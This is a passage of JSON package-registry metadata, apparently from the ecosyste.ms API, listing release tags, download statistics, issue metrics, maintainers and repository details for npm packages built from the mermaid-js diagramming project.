0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.5.0/manifests"},{"name":"0.4.0","sha":"cc1a4be15a5ed3726a121a5fce75a561ddca5e1d","kind":"commit","published_at":"2015-03-01T15:48:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.4.0/manifests"},{"name":"0.3.5","sha":"2512666f493e8455f6534f216d42f00a7c9e526f","kind":"commit","published_at":"2015-02-15T18:34:18.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.5/manifests"},{"name":"0.3.4","sha":"074a819ca8d3d98cdef3144d091a63f919d3a55d","kind":"commit","published_at":"2015-02-15T17:11:46.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.4/manifests"},{"name":"0.3.3","sha":"5452be9feda681abb48d6364fbca662c6af0215d","kind":"commit","published_at":"2015-01-25T15:41:43.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.3/manifests"},{"name":"0.3.2","sha":"911cd09dd875deb50f65a98baf21f65ab2cbf82b","kind":"commit","published_at":"2015-01-11T14:02:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.2/manifests"},{"name":"0.3.1","sha":"222a6e06827f194d9368d3a790dbe6cc53341788","kind":"commit","published_at":"2015-01-05T14:32:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.1/manifests"},{"name":"0.3.0","sha":"c50178c640a4f6c99539bcc64cf029e94263fdb4","kind":"commit","published_at":"2014-12-22T12:52:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.3.0/manifests"},{"name":"0.2.16","sha":"5712c6de7bdca29a2950df1e6e0342ca8f0323a4","kind":"commit","published_at":"2014-12-15T18:35:09.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.16","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.16/manifests"},{"name":"0.2.15","sha":"6988dea3535919faa599537c31c5d94a01a30479","kind":"commit","published_at":"2014-12-05T09:50:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.15","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.15/manifests"},{"name":"0.2.14","sha":"dd26960852b4cba1d60e6bb2e508c0af6dd3d4b4","kind":"commit","published_at":"2014-12-03T18:35:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.14","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.14/manifests"},{"name":"0.2.13","sha":"fe2f3b403d1310c2a6e09aac24d0fdd257c2ddcf","kind":"commit","published_at":"2014-12-03T18:29:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.13","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.13/manifests"},{"name":"0.2.10","sha":"15023461722117d1429bbc0eb6030ca35aa51d53","kind":"commit","published_at":"2014-12-01T20:12:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.10","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.10/manifests"},{"name":"0.2.9","sha":"1a7997cdef01882ea7b46948d58625e904a09094","kind":"tag","published_at":"2014-12-01T20:04:35.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.9/manifests"},{"name":"0.2.8","sha":"1d2327c4c2ae60692f9bfe8b4d19ea195ebcbb04","kind":"tag","published_at":"2014-12-01T09:01:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.8/manifests"},{"name":"0.2.7","sha":"cbd41dbb1b4875aa3254babca694844908a1ecf7","kind":"tag","published_at":"2014-12-01T08:30:27.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2025-09-05T05:10:25.185Z","dependent_packages_count":0,"downloads":216,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":24.796624381140585,"dependent_packages_count":35.79501856072888,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":30.295821470934733},"purl":"pkg:npm/%40mermaid-js/tiny","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@mermaid-js/tiny","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@mermaid-js/tiny","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@mermaid-js/tiny/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2025-09-04T10:03:03.268Z","issues_count":1455,"pull_requests_count":1775,"avg_time_to_close_issue":28542620.459340658,"avg_time_to_close_pull_request":2087988.0680977055,"issues_closed_count":453,"pull_requests_closed_count":1351,"pull_request_authors_count":360,"issue_authors_count":1154,"avg_comments_per_issue":3.370446735395189,"avg_comments_per_pull_request":3.8850704225352115,"merged_pull_requests_count":1086,"bot_issues_count":2,"bot_pull_requests_count":340,"past_year_issues_count":440,"past_year_pull_requests_count":804,"past_year_avg_time_to_close_issue":1380901.3846153845,"past_year_avg_time_to_close_pull_request":1090907.6481835565,"past_year_issues_closed_count":65,"past_year_pull_requests_closed_count":523,"past_year_pull_request_authors_count":166,"past_year_issue_authors_count":355,"past_year_avg_comments_per_issue":0.32045454545454544,"past_year_avg_comments_per_pull_request":3.9776119402985075,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":166,"past_year_merged_pull_requests_count":408,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":283,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":84,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":70,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":44,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"saurabhg772244","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"ashishjain0512","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"NicolasNewman","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"shubham-mermaid","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"}],"active_maintainers":[{"login":"sidharthv96","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":38,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"huynhicode","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"saurabhg772244","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"shubham-mermaid","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Ftiny/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Ftiny/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Ftiny/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@mermaid-js%2Ftiny/related_packages","maintainers":[{"uuid":"sidv","login":"sidv","name":null,"email":"npmjs@sidharth.dev","url":null,"packages_count":20,"html_url":"https://www.npmjs.com/~sidv","role":null,"created_at":"2025-04-18T09:17:00.575Z","updated_at":"2025-04-18T09:17:00.575Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/sidv/packages"},{"uuid":"knsv","login":"knsv","name":null,"email":"knsv@sveido.com","url":null,"packages_count":13,"html_url":"https://www.npmjs.com/~knsv","role":null,"created_at":"2025-04-18T09:17:00.438Z","updated_at":"2025-04-18T09:17:00.438Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/knsv/packages"},{"uuid":"ugnikalnis","login":"ugnikalnis","name":null,"email":"mindaugas.laganeckas@gmail.com","url":null,"packages_count":10,"html_url":"https://www.npmjs.com/~ugnikalnis","role":null,"created_at":"2025-04-18T09:17:00.485Z","updated_at":"2025-04-18T09:17:00.485Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ugnikalnis/packages"},{"uuid":"ashishjain0512","login":"ashishjain0512","name":null,"email":"ashishjain0512@gmail.com","url":null,"packages_count":11,"html_url":"https://www.npmjs.com/~ashishjain0512","role":null,"created_at":"2025-04-18T09:17:00.529Z","updated_at":"2025-04-18T09:17:00.529Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/ashishjain0512/packages"},{"uuid":"p_brolin47","login":"p_brolin47","name":null,"email":"per@mermaidchart.com","url":null,"packages_count":11,"html_url":"https://www.npmjs.com/~p_brolin47","role":null,"created_at":"2025-04-18T09:17:00.674Z","updated_at":"2025-04-18T09:17:00.674Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/p_brolin47/packages"},{"uuid":"aloisklink","login":"aloisklink","name":null,"email":"alois@aloisklink.com","url":null,"packages_count":15,"html_url":"https://www.npmjs.com/~aloisklink","role":null,"created_at":"2025-04-18T09:17:00.614Z","updated_at":"2025-04-18T09:17:00.614Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/aloisklink/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":6356004,"name":"@deboxsoft/mermaid","ecosystem":"npm","description":"Markdown-ish syntax for generating flowcharts, sequence diagrams, class diagrams, gantt charts and git graphs.","homepage":"https://github.com/mermaid-js/mermaid#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":["diagram","markdown","flowchart","sequence diagram","gantt","class diagram","git graph"],"namespace":"deboxsoft","versions_count":5,"first_release_published_at":"2023-02-17T19:11:26.700Z","latest_release_published_at":"2023-02-26T09:51:06.808Z","latest_release_number":"9.4.4","last_synced_at":"2025-09-01T12:55:59.984Z","created_at":"2023-02-17T20:17:13.107Z","updated_at":"2025-09-01T12:55:59.985Z","registry_url":"https://www.npmjs.com/package/@deboxsoft/mermaid","install_command":"npm install @deboxsoft/mermaid","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"9.4.4"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2024-04-13T18:33:07.000Z","size":230370,"stargazers_count":66655,"open_issues_count":923,"forks_count":5722,"subscribers_count":632,"default_branch":"develop","last_synced_at":"2024-04-13T21:00:44.868Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2024-04-15T07:05:02.865Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":5515,"total_committers":513,"mean_commits":"10.750487329434698","dds":0.8814143245693563,"last_synced_commit":"56ec1ab52ce15ca7dbe76a3acbe1cb68acb13b2d"},"previous_names":["knsv/mermaid"],"tags_count":137,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":211642624,"owners_count":15327712,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05: